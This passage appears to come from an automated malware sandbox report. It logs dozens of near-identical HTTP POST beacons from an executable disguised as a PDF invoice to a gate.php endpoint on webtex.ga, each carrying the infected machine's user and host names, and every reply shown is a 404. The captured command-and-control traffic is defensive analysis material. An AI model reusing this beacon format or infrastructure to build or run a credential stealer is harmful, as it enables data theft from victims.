                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:43.425293922 CET4708OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:43.473149061 CET4708INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:00 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    184192.168.2.34992347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:43.685041904 CET4709OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:43.701520920 CET4709OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:43.770551920 CET4710INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:00 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    185192.168.2.34992447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:44.011090994 CET4710OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:44.027739048 CET4711OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:44.159611940 CET4711INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:01 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    186192.168.2.34992547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:44.400609970 CET4712OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:44.417494059 CET4712OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:44.459861040 CET4712INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:01 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    187192.168.2.34992647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:44.672941923 CET4713OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:44.689538956 CET4713OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:44.739666939 CET4714INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:01 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    188192.168.2.34992747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:44.968765974 CET4714OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:44.985562086 CET4715OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:45.026278019 CET4715INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:02 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    189192.168.2.34992847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:45.253695011 CET4716OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:45.270554066 CET4716OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:45.313153028 CET4716INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:02 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    19192.168.2.34972847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:36.313062906 CET90OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:36.329809904 CET91OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:36.372262955 CET91INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:53 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    190192.168.2.34992947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:45.764949083 CET4717OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:45.781553984 CET4717OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:45.849649906 CET4718INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:03 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    191192.168.2.34993047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:46.322025061 CET4719OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:46.338753939 CET4719OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:46.379667044 CET4719INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:03 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    192192.168.2.34993147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:46.794392109 CET4720OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:46.811038017 CET4720OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:46.855204105 CET4720INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:04 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    193192.168.2.34993247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:47.319622040 CET4721OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:47.336422920 CET4722OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:47.379466057 CET4722INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:04 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    194192.168.2.34993347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:47.887303114 CET4723OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:47.904119968 CET4723OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:47.950901031 CET4723INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:05 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    195192.168.2.34993447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:48.444667101 CET4724OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:48.461489916 CET4724OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:48.504371881 CET4725INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:05 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    196192.168.2.34993547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:48.999385118 CET4726OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:49.016280890 CET4727OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:49.146349907 CET4727INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:06 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    197192.168.2.34993647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:49.389664888 CET4728OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:49.406409979 CET4728OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:49.483880043 CET4728INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:06 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    198192.168.2.34993747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:49.706676960 CET4729OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:49.723261118 CET4729OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:49.772139072 CET4730INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:07 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    199192.168.2.34993847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:50.340955019 CET4730OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:50.357599974 CET4731OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:50.486013889 CET4731INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:07 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.34971147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:29.611012936 CET67OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:29.627510071 CET67OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:29.858062029 CET68INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:46 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    20192.168.2.34972947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:36.782392025 CET93OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:36.798995972 CET93OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:36.844795942 CET93INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:54 GMT
